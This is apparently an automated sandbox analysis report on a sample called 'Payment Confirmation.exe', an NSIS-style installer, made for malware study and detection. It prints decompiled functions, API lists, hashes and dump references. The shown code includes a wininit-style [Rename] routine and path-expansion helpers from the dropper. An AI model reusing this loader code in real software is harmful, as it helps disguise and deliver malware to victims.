                                                  0x00401165
                                                  0x00401165
                                                  0x00401110
                                                  0x0040116e
                                                  0x00000000
                                                  0x00401178
                                                  0x00401010
                                                  0x00401013
                                                  0x00401015
                                                  0x00401019
                                                  0x0040101f
                                                  0x0040101f
                                                  0x00000000

                                                  APIs
                                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32 ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32 ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextA.USER32(00000000,agrlexd Setup,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F$agrlexd Setup
                                                  • API String ID: 941294808-986349340
                                                  • Opcode ID: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
                                                  • Instruction ID: 81ce27436f0092abe3ce3185f2c65b9207eacd25275343976a1476a18aae1cf1
                                                  • Opcode Fuzzy Hash: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
                                                  • Instruction Fuzzy Hash: 06418B71804249AFCB058F95DD459AFBBB9FF44315F00802AF961AA2A0C738EA51DFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004058E6, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 93%
                                                  			E004058E6(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				intOrPtr _t18;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405F28(2);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423fd0 =  *0x423fd0 + 1;
						return _t20;
					}
				}
				 *0x4226c8 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x422140, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421d40, "%s=%s\r\n", 0x4226c8, 0x422140);
						_t18 =  *0x423f50; // 0x825438
						_t56 = _t55 + 0x10;
						E00405BBA(_t43, 0x400, 0x422140, 0x422140,  *((intOrPtr*)(_t18 + 0x128)));
						_t20 = E0040586F(0x422140, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E004057E4(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004057E4(_t26 + 0xa, 0x4093e4);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E00405830(_t51 + _t29, 0x421d40, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405B98(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040586F(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x4226c8, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}






















                                                  0x004058ec
                                                  0x004058f3
                                                  0x004058f7
                                                  0x00405900
                                                  0x00405904
                                                  0x00405a43
                                                  0x00405a43
                                                  0x00000000
                                                  0x00405a43
                                                  0x00405904
                                                  0x00405910
                                                  0x00405926
                                                  0x0040594e
                                                  0x00405959
                                                  0x0040595d
                                                  0x0040597d
                                                  0x0040597f
                                                  0x00405984
                                                  0x0040598e
                                                  0x0040599b
                                                  0x004059a0
                                                  0x004059a5
                                                  0x004059a9
                                                  0x00000000
                                                  0x00000000
                                                  0x004059b8
                                                  0x004059ba
                                                  0x004059c7
                                                  0x004059cb
                                                  0x00405a3c
                                                  0x00405a3d
                                                  0x00000000
                                                  0x004059e7
                                                  0x004059f4
                                                  0x00405a59
                                                  0x00405a60
                                                  0x00405a07
                                                  0x00405a07
                                                  0x00405a09
                                                  0x00405a12
                                                  0x00405a1d
                                                  0x00405a2f
                                                  0x00405a36
                                                  0x00000000
                                                  0x00405a36
                                                  0x00405a62
                                                  0x00405a63
                                                  0x00405a68
                                                  0x00405a6a
                                                  0x00405a77
                                                  0x00405a77
                                                  0x00405a7b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405a6c
                                                  0x00405a6c
                                                  0x00405a6f
                                                  0x00405a72
                                                  0x00405a73
                                                  0x00000000
                                                  0x00405a6c
                                                  0x004059ff
                                                  0x00405a04
                                                  0x00000000
                                                  0x00405a04
                                                  0x004059cb
                                                  0x00405928
                                                  0x00405933
                                                  0x0040593c
                                                  0x00405940
                                                  0x00000000
                                                  0x00000000
                                                  0x00405940
                                                  0x00405a4d

                                                  APIs
                                                    • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                    • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,0040567B,?,00000000,000000F1,?), ref: 00405933
                                                  • GetShortPathNameA.KERNEL32 ref: 0040593C
                                                  • GetShortPathNameA.KERNEL32 ref: 00405959
                                                  • wsprintfA.USER32 ref: 00405977
                                                  • GetFileSize.KERNEL32(00000000,00000000,00422140,C0000000,00000004,00422140,?,?,?,00000000,000000F1,?), ref: 004059B2
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059C1
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004059D7
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421D40,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A1D
                                                  • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405A2F
                                                  • GlobalFree.KERNEL32 ref: 00405A36
                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A3D
                                                    • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                                                    • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                                                  • String ID: %s=%s$@!B$[Rename]
                                                  • API String ID: 3445103937-2946522640
                                                  • Opcode ID: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                                                  • Instruction ID: 3fdb6a032fd62a2424e34f1ba2115feadd67922d203a780a084708b988c1bb31
                                                  • Opcode Fuzzy Hash: ba6dd0a96c47d1f42225f0131925257862b6081e9796f2b12c44a8ffad6b8124
                                                  • Instruction Fuzzy Hash: C8410231B01B167BD7206B619D89F6B3A5CEF44755F04013AFD05F62D2E67CA8008EAD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405BBA, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 197stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 74%
                                                  			E00405BBA(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				intOrPtr _t73;
				signed int _t74;
				signed int _t75;
				intOrPtr _t79;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t79 =  *0x42371c; // 0x82d0fc
					_t36 =  *(_t79 - 4 + _t36 * 4);
				}
				_t73 =  *0x423f78; // 0x82b77c
				_t74 = _t73 + _t36;
				_t37 = 0x422ee0;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x422ee0;
				if(_a4 - 0x422ee0 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405BBA(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x422ee0;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x425000;
							E00405B98(_t86, (_t95 << 0xa) + 0x425000);
						} else {
							E00405AF6(_t86,  *0x423f48);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405DFA(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x423fc4;
						if( *0x423fc4 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x423f44; // 0x74691340
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
										_t53 = SHGetSpecialFolderLocation( *0x423f48,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x423f48,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x423f78;
							E00405A7F(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x423f78, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405BBA(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405B98(_a4, _t37);
			}






























                                                  0x00405bba
                                                  0x00405bba
                                                  0x00405bba
                                                  0x00405bc0
                                                  0x00405bc5
                                                  0x00405bc7
                                                  0x00405bd6
                                                  0x00405bd6
                                                  0x00405bd8
                                                  0x00405be1
                                                  0x00405be3
                                                  0x00405be8
                                                  0x00405beb
                                                  0x00405bec
                                                  0x00405bf3
                                                  0x00405bf5
                                                  0x00405bfb
                                                  0x00405bfe
                                                  0x00405bfe
                                                  0x00405dd7
                                                  0x00405dd7
                                                  0x00405ddb
                                                  0x00000000
                                                  0x00000000
                                                  0x00405c0b
                                                  0x00405c11
                                                  0x00000000
                                                  0x00000000
                                                  0x00405c17
                                                  0x00405c18
                                                  0x00405c1b
                                                  0x00405c1e
                                                  0x00405dca
                                                  0x00405dd4
                                                  0x00405dd6
                                                  0x00405dd6
                                                  0x00405dcc
                                                  0x00405dce
                                                  0x00405dd0
                                                  0x00405dd1
                                                  0x00405dd1
                                                  0x00000000
                                                  0x00405dca
                                                  0x00405c24
                                                  0x00405c28
                                                  0x00405c38
                                                  0x00405c3c
                                                  0x00405c43
                                                  0x00405c46
                                                  0x00405c4a
                                                  0x00405c50
                                                  0x00405c53
                                                  0x00405c56
                                                  0x00405c59
                                                  0x00405d74
                                                  0x00405d77
                                                  0x00405da7
                                                  0x00405daa
                                                  0x00405daf
                                                  0x00405db3
                                                  0x00405db3
                                                  0x00405db8
                                                  0x00405db9
                                                  0x00405dbe
                                                  0x00405dc1
                                                  0x00405dc3
                                                  0x00000000
                                                  0x00405dc3
                                                  0x00405d79
                                                  0x00405d7c
                                                  0x00405d91
                                                  0x00405d98
                                                  0x00405d7e
                                                  0x00405d85
                                                  0x00405d85
                                                  0x00405da0
                                                  0x00405da3
                                                  0x00405d6c
                                                  0x00405d6d
                                                  0x00405d6d
                                                  0x00000000
                                                  0x00405da3
                                                  0x00405c61
                                                  0x00405c62
                                                  0x00405c68
                                                  0x00405c6a
                                                  0x00405c84
                                                  0x00405c84
                                                  0x00405c8b
                                                  0x00405c8b
                                                  0x00405c92
                                                  0x00405c96
                                                  0x00405c96
                                                  0x00405c97
                                                  0x00405c99
                                                  0x00405cd2
                                                  0x00405cd5
                                                  0x00405ce5
                                                  0x00405ce8
                                                  0x00405cf0
                                                  0x00405cf6
                                                  0x00405cf6
                                                  0x00405d52
                                                  0x00405d52
                                                  0x00405d54
                                                  0x00000000
                                                  0x00000000
                                                  0x00405cfa
                                                  0x00405d01
                                                  0x00405d02
                                                  0x00405d04
                                                  0x00405d1e
                                                  0x00405d2c
                                                  0x00405d32
                                                  0x00405d34
                                                  0x00405d4f
                                                  0x00405d4f
                                                  0x00405d4f
                                                  0x00000000
                                                  0x00405d4f
                                                  0x00405d3a
                                                  0x00405d45
                                                  0x00405d4b
                                                  0x00405d4d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405d4d
                                                  0x00405d06
                                                  0x00405d09
                                                  0x00000000
                                                  0x00000000
                                                  0x00405d18
                                                  0x00405d1a
                                                  0x00405d1c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405d1c
                                                  0x00000000
                                                  0x00405d52
                                                  0x00405cdd
                                                  0x00000000
                                                  0x00405c9b
                                                  0x00405ca0
                                                  0x00405cb6
                                                  0x00405cbb
                                                  0x00405cbe
                                                  0x00405d5b
                                                  0x00405d5b
                                                  0x00405d5f
                                                  0x00405d67
                                                  0x00405d67
                                                  0x00000000
                                                  0x00405d5f
                                                  0x00405cc8
                                                  0x00405d56
                                                  0x00405d56
                                                  0x00405d59
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405d59
                                                  0x00405c99
                                                  0x00405c6c
                                                  0x00405c70
                                                  0x00000000
                                                  0x00000000
                                                  0x00405c72
                                                  0x00405c76
                                                  0x00000000
                                                  0x00000000
                                                  0x00405c78
                                                  0x00405c7c
                                                  0x00000000
                                                  0x00405c7e
                                                  0x00405c7e
                                                  0x00000000
                                                  0x00405c7e
                                                  0x00405c7c
                                                  0x00405de1
                                                  0x00405deb
                                                  0x00405df7
                                                  0x00405df7
                                                  0x00000000

                                                  APIs
                                                  • GetVersion.KERNEL32(00000000,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405C62
                                                  • GetSystemDirectoryA.KERNEL32 ref: 00405CDD
                                                  • GetWindowsDirectoryA.KERNEL32(naqeld,00000400), ref: 00405CF0
                                                  • SHGetSpecialFolderLocation.SHELL32(?,0040F0E0), ref: 00405D2C
                                                  • SHGetPathFromIDListA.SHELL32(0040F0E0,naqeld), ref: 00405D3A
                                                  • CoTaskMemFree.OLE32(0040F0E0), ref: 00405D45
                                                  • lstrcatA.KERNEL32(naqeld,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D67
                                                  • lstrlenA.KERNEL32(naqeld,00000000,0041FD10,00000000,00404EBC,0041FD10,00000000), ref: 00405DB9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                  • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$naqeld
                                                  • API String ID: 900638850-3739255073
                                                  • Opcode ID: 722f7ba73d7118e4ab3b6bf0c831072dc3c77b8f74574a686c3719bf3172466b
                                                  • Instruction ID: c09fc2b2839bb59ef3d9b0e1161cb0e194e2e056f91f07e7f33828596fbb00b3
                                                  • Opcode Fuzzy Hash: 722f7ba73d7118e4ab3b6bf0c831072dc3c77b8f74574a686c3719bf3172466b
                                                  • Instruction Fuzzy Hash: CE51F331A04A05AAEF215F648C88BBF3B74EF05714F10827BE911B62E0D27C5942DF5E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 10003A80, Relevance: 16.7, APIs: 11, Instructions: 154fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.368543351.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.368523282.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368638244.0000000010014000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368656511.000000001001A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368686162.000000001001F000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: CreateErrorFileLast$CloseHandle
                                                  • String ID:
                                                  • API String ID: 3924142190-0
                                                  • Opcode ID: 7c263b39cea41aced05f816a47fe5171d606ac828837044e99c881637079cc28
                                                  • Instruction ID: 702786033387b3e63d7ae95012ac77846192948fc05bc0b59fcfd4f5648bd488
                                                  • Opcode Fuzzy Hash: 7c263b39cea41aced05f816a47fe5171d606ac828837044e99c881637079cc28
                                                  • Instruction Fuzzy Hash: 9871B4B490435ACFEB00DFA8C58879EBBF4FB48354F10892AE855A7384D7749A44CF92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 100025C0, Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 321COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.368543351.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000001.00000002.368523282.0000000010000000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368638244.0000000010014000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368656511.000000001001A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.368686162.000000001001F000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID: W$decode failure: data corruption or bug.$z
                                                  • API String ID: 0-3221231465
                                                  • Opcode ID: 4eeeffa3b3e83140935d2ff8f933b2fe96e05a7da17ff7863da12bec3c22671d
                                                  • Instruction ID: 376ef55dcc2e329a67cb028ed6133c9bf984c1e2eef3263c8f21430a7c0dc007
                                                  • Opcode Fuzzy Hash: 4eeeffa3b3e83140935d2ff8f933b2fe96e05a7da17ff7863da12bec3c22671d
                                                  • Instruction Fuzzy Hash: 85F1B174E0520ACFEB14DF98C585A9EBBF1FF48394F218429E849A7354C734A981CF92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00405DFA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00405DFA(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004056F8(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004056B6("*?|<>/\":", _t5))) == 0) {
							E00405830(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                  0x00405dfc
                                                  0x00405e04
                                                  0x00405e18
                                                  0x00405e18
                                                  0x00405e1e
                                                  0x00405e2b
                                                  0x00405e2b
                                                  0x00405e2c
                                                  0x00405e2e
                                                  0x00405e32
                                                  0x00405e34
                                                  0x00405e3d
                                                  0x00405e3f
                                                  0x00405e59
                                                  0x00405e61
                                                  0x00405e61
                                                  0x00405e66
                                                  0x00405e68
                                                  0x00405e6a
                                                  0x00405e6e
                                                  0x00405e6f
                                                  0x00405e72
                                                  0x00405e7a
                                                  0x00405e7c
                                                  0x00405e80
                                                  0x00000000
                                                  0x00000000
                                                  0x00405e86
                                                  0x00405e8b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405e8b
                                                  0x00405e90

                                                  APIs
                                                  • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Payment Confirmation.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E52
                                                  • CharNextA.USER32(?,?,?,00000000), ref: 00405E5F
                                                  • CharNextA.USER32(?,"C:\Users\user\Desktop\Payment Confirmation.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E64
                                                  • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E74
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.366705430.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.366701235.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366711989.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366716712.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366728837.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366732375.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000001.00000002.366736772.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: "C:\Users\user\Desktop\Payment Confirmation.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 589700163-3680727535
                                                  • Opcode ID: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                                  • Instruction ID: 8fb4f4a5a46673644b6d17db89182f96b33943a1441b7055d0135b6347a17e40
                                                  • Opcode Fuzzy Hash: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                                  • Instruction Fuzzy Hash: 0411B971804A9029EB321734DC44B7B7F88CB9A7A0F18447BD9D4722C2D67C5E429BED
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00403EBB, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00403EBB(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
